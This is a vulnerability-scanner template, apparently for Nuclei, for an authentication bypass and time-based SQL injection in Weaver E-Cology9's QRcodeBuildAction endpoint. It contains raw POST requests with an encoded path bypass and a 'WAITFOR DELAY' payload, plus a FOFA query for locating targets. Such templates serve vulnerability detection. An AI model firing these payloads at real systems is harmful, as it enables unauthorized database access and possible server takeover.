http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          POST /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
          Content-Type: application/x-www-form-urlencoded

          modeid={{random_number}}+WAITFOR+DELAY+'0%3a0%3a4'
        - |
          POST /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
          Content-Type: application/x-www-form-urlencoded

          modeid={{random_numberr}}+WAITFOR+DELAY+'0%3a0%3a8'
id: WeaverOA-E-Cology9-QRcodeBuildAction-sql
info:
    author: Superhero
    description: |-
        fofa: body="doCheckPopupBlocked"
        由于泛微E-Cology9 weaver.formmode.servelt.QRcodeBuildAction接口未对用户传入的数据进行严格的校验和过滤，导致攻击者利用多层编码的方式绕过身份认证进行SQL注入，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 泛微E-Cology9 QRcodeBuildAction 身份认证绕过导致SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489291&idx=1&sn=391bf86b90114cbfd49b6c9a74bd6cdb&chksm=c267a238f5102b2e59bd1b0c434c78096bae24c63fc976cb834508e102d9425a0441afd37adb&token=1884652675&lang=zh_CN#rd
    severity: high
    tags: []
variables:
    random_number: '{{rand_int(1000, 9999)}}'
    random_numberr: '{{rand_int(10000, 99999)}}'
